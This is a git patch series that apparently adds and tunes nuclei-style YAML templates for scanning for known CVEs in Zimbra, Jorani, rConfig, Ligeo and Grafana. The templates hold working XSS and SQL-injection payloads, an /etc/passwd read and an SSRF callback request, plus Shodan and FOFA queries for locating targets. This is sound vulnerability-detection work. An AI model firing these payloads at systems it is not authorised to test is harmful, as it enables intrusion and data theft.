From e3ffead64fe14fd924e62634c488a3dd79798cc9 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 20 Jul 2023 23:57:03 +0530
Subject: [PATCH 01/30] Create CVE-2023-34192.yaml (Zimbra XSS)
---
http/cves/2023/CVE-2023-34192.yaml | 49 ++++++++++++++++++++++++++++++
1 file changed, 49 insertions(+)
create mode 100644 http/cves/2023/CVE-2023-34192.yaml
diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml
new file mode 100644
index 00000000000..4fdc9dd6c41
--- /dev/null
+++ b/http/cves/2023/CVE-2023-34192.yaml
@@ -0,0 +1,49 @@
+id: CVE-2023-34192
+
+info:
+ name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: high
+ description: |
+ Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.
+ reference:
+ - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA
+ - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192
+ classification:
+ cve-id: CVE-2023-34192
+ metadata:
+ max-request: 1
+ shodan-query: http.favicon.hash:475145467
+ fofa-query: icon_hash="475145467"
+ tags: cve,cve2023,zimbra,xss,authenticated
+
+http:
+ - raw:
+ - |
+ POST /zimbra/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ loginOp=login&username={{username}}&password={{password}}&client=preferred
+
+ - |
+ GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
From 8feb47bead4b394414fb1f4088e5b9f6821ddf06 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 29 Aug 2023 16:42:34 +0530
Subject: [PATCH 02/30] Update CVE-2023-34192.yaml
---
http/cves/2023/CVE-2023-34192.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml
index 4fdc9dd6c41..851c5d6d00b 100644
--- a/http/cves/2023/CVE-2023-34192.yaml
+++ b/http/cves/2023/CVE-2023-34192.yaml
@@ -35,15 +35,18 @@ http:
matchers-condition: and
matchers:
- type: word
- part: body
+ part: body_2
words:
- ""
+ - "zimbra"
+ condition: and
- type: word
- part: header
+ part: header_2
words:
- text/html
- type: status
+ part: header_2
status:
- 200
From 474ee5baf4f8881f4f4e0cf75ad1b12fe9fc03a9 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 31 Aug 2023 21:13:46 +0530
Subject: [PATCH 03/30] Create CVE-2018-15917.yaml
---
http/cves/2018/CVE-2018-15917.yaml | 50 ++++++++++++++++++++++++++++++
1 file changed, 50 insertions(+)
create mode 100644 http/cves/2018/CVE-2018-15917.yaml
diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml
new file mode 100644
index 00000000000..0cee8304d1b
--- /dev/null
+++ b/http/cves/2018/CVE-2018-15917.yaml
@@ -0,0 +1,50 @@
+id: CVE-2018-15917
+
+info:
+ name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: medium
+ description: |
+ Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.
+ reference:
+ - https://www.exploit-db.com/exploits/45338
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-15917
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2018-15917
+ cwe-id: CWE-79
+ metadata:
+ max-request: 2
+ verified: true
+ shodan-query: title:"Login - Jorani"
+ tags: cve,cve2018,jorani,xss
+
+http:
+ - raw:
+ - |
+ GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /session/login HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+ - '_jorani'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
From bd82733d503da504a9efdf21db8ac962e925aaf2 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 31 Aug 2023 15:52:35 +0000
Subject: [PATCH 04/30] Auto Generated New Template Addition List [Thu Aug 31
15:52:35 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 4842155e806..78570d1c2e9 100644
--- a/.new-additions
+++ b/.new-additions
@@ -8,6 +8,7 @@ http/cves/2023/CVE-2023-27034.yaml
http/cves/2023/CVE-2023-30150.yaml
http/cves/2023/CVE-2023-32563.yaml
http/cves/2023/CVE-2023-34124.yaml
+http/cves/2023/CVE-2023-34192.yaml
http/cves/2023/CVE-2023-36844.yaml
http/exposed-panels/aspcms-backend-panel.yaml
http/exposed-panels/greenbone-panel.yaml
From 074dbe22ef1115a5a5187dc678df3a5903ecec5f Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 31 Aug 2023 15:52:51 +0000
Subject: [PATCH 05/30] Auto Generated Templates Checksum [Thu Aug 31 15:52:51
UTC 2023] :robot:
---
templates-checksum.txt | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 146ee08a5fe..108c3533a97 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2591,6 +2591,7 @@ http/cves/2023/CVE-2023-3345.yaml:81aa4e514ec7e42c0c04e9525c0a07dc2023e301
http/cves/2023/CVE-2023-33510.yaml:2c13c6f56ab0416bdd7e53d28814a6f565302605
http/cves/2023/CVE-2023-33568.yaml:eb301b833721e18854829e2af5f33287788bd00e
http/cves/2023/CVE-2023-34124.yaml:bb268f4fb1c4909a6897e8275b1f5f60fcb8886f
+http/cves/2023/CVE-2023-34192.yaml:3492af7485b11f827328fc0bf36ed42654b4eaa9
http/cves/2023/CVE-2023-34362.yaml:c3e8ebce7d7e6d851ee37989c43faa13f3fb8c82
http/cves/2023/CVE-2023-34537.yaml:961d0827d05c1234d0e00da2ed0ae49f08d0d9de
http/cves/2023/CVE-2023-34598.yaml:e6d11470360f77660a6b9751e2a68c368fc03d29
@@ -7028,7 +7029,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:b3331acaaf83635e0a2917f1d34fac12751dc777
+templates-checksum.txt:62440b663c7439c29890cef47623131debd207b6
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 047ecaa915f99daa584eea66c2925e202d87196c Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 31 Aug 2023 15:54:09 +0000
Subject: [PATCH 06/30] TemplateMan Update [Thu Aug 31 15:54:09 UTC 2023]
:robot:
---
http/cves/2023/CVE-2023-34192.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml
index 851c5d6d00b..d497b6c3e9d 100644
--- a/http/cves/2023/CVE-2023-34192.yaml
+++ b/http/cves/2023/CVE-2023-34192.yaml
@@ -13,9 +13,9 @@ info:
classification:
cve-id: CVE-2023-34192
metadata:
- max-request: 1
- shodan-query: http.favicon.hash:475145467
fofa-query: icon_hash="475145467"
+ max-request: 2
+ shodan-query: http.favicon.hash:475145467
tags: cve,cve2023,zimbra,xss,authenticated
http:
From c1b56ad7282058acfa9c4be1e879a6e5e27f1bca Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Thu, 31 Aug 2023 15:55:17 +0000
Subject: [PATCH 07/30] Auto Generated Templates Checksum [Thu Aug 31 15:55:17
UTC 2023] :robot:
---
templates-checksum.txt | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 108c3533a97..825b0008e32 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -1120,6 +1120,7 @@ http/cves/2018/CVE-2018-15138.yaml:36f31a268f34ecb7d3bc9dbb8780a3331a0a85a0
http/cves/2018/CVE-2018-15517.yaml:630aa932c228a3d5ab7535ce105b7221c784375f
http/cves/2018/CVE-2018-15535.yaml:5a976b8f0b17f4042a90bde5f49012c04bd0ee9a
http/cves/2018/CVE-2018-15745.yaml:367ddf7a4c089a1476fe48716e69e9b0e8594190
+http/cves/2018/CVE-2018-15917.yaml:ea9408feec6802710f83f0e55caeec4aa7652fb9
http/cves/2018/CVE-2018-15961.yaml:cb650b9eb6d6106d7fdd8ee6d9caf616396c0339
http/cves/2018/CVE-2018-16059.yaml:346b58eb5f9f9828c0a43fe5de951bef08d6f84e
http/cves/2018/CVE-2018-16133.yaml:887665262f6debceddc70e7f66ca2bb21a791555
@@ -2591,7 +2592,7 @@ http/cves/2023/CVE-2023-3345.yaml:81aa4e514ec7e42c0c04e9525c0a07dc2023e301
http/cves/2023/CVE-2023-33510.yaml:2c13c6f56ab0416bdd7e53d28814a6f565302605
http/cves/2023/CVE-2023-33568.yaml:eb301b833721e18854829e2af5f33287788bd00e
http/cves/2023/CVE-2023-34124.yaml:bb268f4fb1c4909a6897e8275b1f5f60fcb8886f
-http/cves/2023/CVE-2023-34192.yaml:3492af7485b11f827328fc0bf36ed42654b4eaa9
+http/cves/2023/CVE-2023-34192.yaml:8affac232592b125b819252a29ac21b5e6f40b05
http/cves/2023/CVE-2023-34362.yaml:c3e8ebce7d7e6d851ee37989c43faa13f3fb8c82
http/cves/2023/CVE-2023-34537.yaml:961d0827d05c1234d0e00da2ed0ae49f08d0d9de
http/cves/2023/CVE-2023-34598.yaml:e6d11470360f77660a6b9751e2a68c368fc03d29
@@ -7029,7 +7030,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:62440b663c7439c29890cef47623131debd207b6
+templates-checksum.txt:d870019ea88cbf135ce6da5ba999cc09d4894bba
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 3b74f3747d9a70705bd2b449aac417b181ceb941 Mon Sep 17 00:00:00 2001
From: Tarunkant Gupta
Date: Thu, 31 Aug 2023 23:08:16 +0530
Subject: [PATCH 08/30] Adding one more path in CVE-2020-13379.yaml
---
http/cves/2020/CVE-2020-13379.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml
index ffe2cb9506b..f89c67e0a89 100644
--- a/http/cves/2020/CVE-2020-13379.yaml
+++ b/http/cves/2020/CVE-2020-13379.yaml
@@ -32,7 +32,9 @@ http:
- method: GET
path:
- "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"
+ - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
From 2f34f7c4b23c506e9968aa650c61b1575d658d51 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 1 Sep 2023 00:52:01 +0530
Subject: [PATCH 09/30] Update rconfig-file-upload.yaml
---
http/vulnerabilities/other/rconfig-file-upload.yaml | 13 +++++++------
1 file changed, 7 insertions(+), 6 deletions(-)
diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml
index 3604834e617..3ef207e3ca0 100644
--- a/http/vulnerabilities/other/rconfig-file-upload.yaml
+++ b/http/vulnerabilities/other/rconfig-file-upload.yaml
@@ -1,20 +1,21 @@
-id: rconfig-rce
+id: rconfig-file-upload
info:
name: rConfig 3.9.5 - Arbitrary File Upload
author: dwisiswant0
severity: high
- description: rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+ description: |
+ rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+ reference:
+ - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
+ - https://www.exploit-db.com/exploits/48878
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-434
- reference:
- - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- - https://www.exploit-db.com/exploits/48878
- tags: rconfig,rce,edb
metadata:
max-request: 1
+ tags: rconfig,rce,edb
http:
- raw:
From d425d8da65de492d53052968494339b92900b4f0 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 1 Sep 2023 00:53:15 +0530
Subject: [PATCH 10/30] Create CVE-2020-10220.yaml
---
http/cves/2020/CVE-2020-10220.yaml | 40 ++++++++++++++++++++++++++++++
1 file changed, 40 insertions(+)
create mode 100644 http/cves/2020/CVE-2020-10220.yaml
diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml
new file mode 100644
index 00000000000..04772657853
--- /dev/null
+++ b/http/cves/2020/CVE-2020-10220.yaml
@@ -0,0 +1,40 @@
+id: CVE-2020-10220
+
+info:
+ name: rConfig 3.9 - SQL injection
+ author: ritikchaddha
+ severity: critical
+ description: |
+ An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
+ reference:
+ - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-10220
+ classification:
+ cve-id: CVE-2020-10220
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cwe-id: CWE-89
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: title:"rConfig"
+ tags: cve,cve2020,rconfig,sqli
+
+variables:
+ num: "999999999"
+
+http:
+ - raw:
+ - |
+ GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5({{num}})}}'
+
+ - type: status
+ status:
+ - 200
From 42b3dfeeb48a4dfb3d6ba8595831ca62fd3a79d6 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 1 Sep 2023 01:19:52 +0530
Subject: [PATCH 11/30] Create CVE-2021-46107.yaml
---
http/cves/2021/CVE-2021-46107.yaml | 42 ++++++++++++++++++++++++++++++
1 file changed, 42 insertions(+)
create mode 100644 http/cves/2021/CVE-2021-46107.yaml
diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml
new file mode 100644
index 00000000000..ba7372945c8
--- /dev/null
+++ b/http/cves/2021/CVE-2021-46107.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-46107
+
+info:
+ name: Ligeo Archives Ligeo Basics - Server Side Request Forgery
+ author: ritikchaddha
+ severity: high
+ description: |
+ Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.
+ reference:
+ - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-46107
+ classification:
+ cve-id: CVE-2021-46107
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-918
+ metadata:
+ max-request: 1
+ verified: true
+ shodan-query: title:"Ligeo"
+ fofa-query: title="Ligeo"
+ tags: cve,cve2021,ligeo,ssrf,lfr
+
+http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /archive/download?file=file:///etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')"
+ - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"
From c489128f2c74c23b68e5f36d1ec010856828f83b Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 1 Sep 2023 02:50:44 +0000
Subject: [PATCH 12/30] Auto Generated New Template Addition List [Fri Sep 1
02:50:44 UTC 2023] :robot:
---
.new-additions | 2 ++
1 file changed, 2 insertions(+)
diff --git a/.new-additions b/.new-additions
index 78570d1c2e9..64151e7a60e 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,6 +1,8 @@
http/cnvd/2021/CNVD-2021-32799.yaml
http/cves/2016/CVE-2016-10108.yaml
+http/cves/2018/CVE-2018-15917.yaml
http/cves/2020/CVE-2020-11798.yaml
+http/cves/2021/CVE-2021-46107.yaml
http/cves/2022/CVE-2022-22897.yaml
http/cves/2023/CVE-2023-20073.yaml
http/cves/2023/CVE-2023-26469.yaml
From 8957e95908937fd5deec4004c0c489cb5c7c8083 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 1 Sep 2023 02:50:53 +0000
Subject: [PATCH 13/30] Auto Generated Templates Checksum [Fri Sep 1 02:50:53
UTC 2023] :robot:
---
templates-checksum.txt | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 825b0008e32..5f90b38bc60 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2032,6 +2032,7 @@ http/cves/2021/CVE-2021-46069.yaml:4a66853e90d99951c71c877bb4f3912ad58d21ca
http/cves/2021/CVE-2021-46071.yaml:e72f5409191f3fdcf79c20316aa900616aea5d91
http/cves/2021/CVE-2021-46072.yaml:a2b12e554f7f5713084305bf3f5a005a43dc0cd4
http/cves/2021/CVE-2021-46073.yaml:b3b6ebe4a5cad18f2900529a17d133cbcc048238
+http/cves/2021/CVE-2021-46107.yaml:5f300c8a7ac163ed6bba25cf894cb41dc7aaea6f
http/cves/2021/CVE-2021-46379.yaml:9cef057ba92e93d700d00e0a80569c02278c6cd6
http/cves/2021/CVE-2021-46381.yaml:55315c21c062982a73fcf7ef3b843e59c25f6953
http/cves/2021/CVE-2021-46387.yaml:224cf815250e716166a2f1a7abce55b048ab93a6
@@ -7030,7 +7031,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:d870019ea88cbf135ce6da5ba999cc09d4894bba
+templates-checksum.txt:dfee7afe890c59845f4f2c2e72222a0daac81e00
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 3194deebc45258433a889599db0e2a5bc6bb9fbc Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 1 Sep 2023 02:52:14 +0000
Subject: [PATCH 14/30] TemplateMan Update [Fri Sep 1 02:52:14 UTC 2023]
:robot:
---
http/cves/2021/CVE-2021-46107.yaml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml
index ba7372945c8..466d24fa8a6 100644
--- a/http/cves/2021/CVE-2021-46107.yaml
+++ b/http/cves/2021/CVE-2021-46107.yaml
@@ -10,15 +10,15 @@ info:
- https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-46107
classification:
- cve-id: CVE-2021-46107
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
+ cve-id: CVE-2021-46107
cwe-id: CWE-918
metadata:
- max-request: 1
- verified: true
- shodan-query: title:"Ligeo"
fofa-query: title="Ligeo"
+ max-request: 3
+ shodan-query: title:"Ligeo"
+ verified: true
tags: cve,cve2021,ligeo,ssrf,lfr
http:
From 34070ef192c33d0513f8ea0151d52d2f6c0b5d84 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 1 Sep 2023 02:52:46 +0000
Subject: [PATCH 15/30] Auto Generated New Template Addition List [Fri Sep 1
02:52:46 UTC 2023] :robot:
From fa54196a624b3fef9671a9dfd1a3758501f07588 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 1 Sep 2023 02:52:49 +0000
Subject: [PATCH 16/30] Auto Generated Templates Checksum [Fri Sep 1 02:52:49
UTC 2023] :robot:
---
templates-checksum.txt | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 5f90b38bc60..0c7a030339e 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -1413,7 +1413,7 @@ http/cves/2020/CVE-2020-13121.yaml:9dc7b16d238c0f459e1c859af2eee995a490a654
http/cves/2020/CVE-2020-13158.yaml:f62235f5a3b204038b3da15490ab9114643183b8
http/cves/2020/CVE-2020-13167.yaml:65c3c0a11291c74e4ccb4e0b79ed0957d0a8de7c
http/cves/2020/CVE-2020-13258.yaml:aa3db4375fb4584fac99169f08ac1cda299855f3
-http/cves/2020/CVE-2020-13379.yaml:4c62c2dda3258e27300b0607a29312d19622297d
+http/cves/2020/CVE-2020-13379.yaml:9b132983130683cf205fb619c8f5253cecb56b23
http/cves/2020/CVE-2020-13405.yaml:364c8a655d463164f79a3da5c045565d4fa9ff57
http/cves/2020/CVE-2020-13483.yaml:34af617d306d7bf273b42a8056f5025cd910a442
http/cves/2020/CVE-2020-13700.yaml:1a7bc8e4b8c9e42c098330b55f7f2365e48c71ca
@@ -2032,7 +2032,7 @@ http/cves/2021/CVE-2021-46069.yaml:4a66853e90d99951c71c877bb4f3912ad58d21ca
http/cves/2021/CVE-2021-46071.yaml:e72f5409191f3fdcf79c20316aa900616aea5d91
http/cves/2021/CVE-2021-46072.yaml:a2b12e554f7f5713084305bf3f5a005a43dc0cd4
http/cves/2021/CVE-2021-46073.yaml:b3b6ebe4a5cad18f2900529a17d133cbcc048238
-http/cves/2021/CVE-2021-46107.yaml:5f300c8a7ac163ed6bba25cf894cb41dc7aaea6f
+http/cves/2021/CVE-2021-46107.yaml:a1658d92714c11c9665ff45882cb7458bb5f4f8c
http/cves/2021/CVE-2021-46379.yaml:9cef057ba92e93d700d00e0a80569c02278c6cd6
http/cves/2021/CVE-2021-46381.yaml:55315c21c062982a73fcf7ef3b843e59c25f6953
http/cves/2021/CVE-2021-46387.yaml:224cf815250e716166a2f1a7abce55b048ab93a6
@@ -7031,7 +7031,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:dfee7afe890c59845f4f2c2e72222a0daac81e00
+templates-checksum.txt:1fac060039113823ee275fbf0ce92a110e7f1c25
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From 57b1bc174f8f9edff9e849a8707e88164ce21dbe Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 1 Sep 2023 08:23:59 +0530
Subject: [PATCH 17/30] tags and metadata added
---
http/vulnerabilities/other/rconfig-file-upload.yaml | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml
index 3ef207e3ca0..b3635e1d8ac 100644
--- a/http/vulnerabilities/other/rconfig-file-upload.yaml
+++ b/http/vulnerabilities/other/rconfig-file-upload.yaml
@@ -15,7 +15,9 @@ info:
cwe-id: CWE-434
metadata:
max-request: 1
- tags: rconfig,rce,edb
+ shodan-query: title:"rConfig"
+ verified: true
+ tags: rconfig,rce,edb,file-upload,instrusive
http:
- raw:
From af9148890b937d97705d44d2db2b11163454937f Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 1 Sep 2023 02:54:41 +0000
Subject: [PATCH 18/30] TemplateMan Update [Fri Sep 1 02:54:41 UTC 2023]
:robot:
---
http/cves/2020/CVE-2020-13379.yaml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml
index f89c67e0a89..b6f06735253 100644
--- a/http/cves/2020/CVE-2020-13379.yaml
+++ b/http/cves/2020/CVE-2020-13379.yaml
@@ -18,14 +18,14 @@ info:
cvss-score: 8.2
cve-id: CVE-2020-13379
cwe-id: CWE-918
- epss-score: 0.16322
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ epss-score: 0.16322
metadata:
- max-request: 1
+ max-request: 2
+ product: grafana
shodan-query: title:"Grafana"
- verified: true
vendor: grafana
- product: grafana
+ verified: true
tags: cve,cve2020,grafana,ssrf
http:
From 0d9daed8d8a2e6aaea9d9e82ca1c8fba9aabba43 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 1 Sep 2023 08:25:12 +0530
Subject: [PATCH 19/30] matchers-condition: and added
---
http/cves/2020/CVE-2020-10220.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml
index 04772657853..860bb427fd0 100644
--- a/http/cves/2020/CVE-2020-10220.yaml
+++ b/http/cves/2020/CVE-2020-10220.yaml
@@ -29,6 +29,7 @@ http:
GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1
Host: {{Hostname}}
+ matchers-condition: and
matchers:
- type: word
part: body
From a72b3a4f113f6147c2f9eeaab753a55a0ac5bbef Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Fri, 1 Sep 2023 03:02:32 +0000
Subject: [PATCH 20/30] Auto Generated New Template Addition List [Fri Sep 1
03:02:32 UTC 2023] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 64151e7a60e..f8e33bf79fa 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,6 +1,7 @@
http/cnvd/2021/CNVD-2021-32799.yaml
http/cves/2016/CVE-2016-10108.yaml
http/cves/2018/CVE-2018-15917.yaml
+http/cves/2020/CVE-2020-10220.yaml
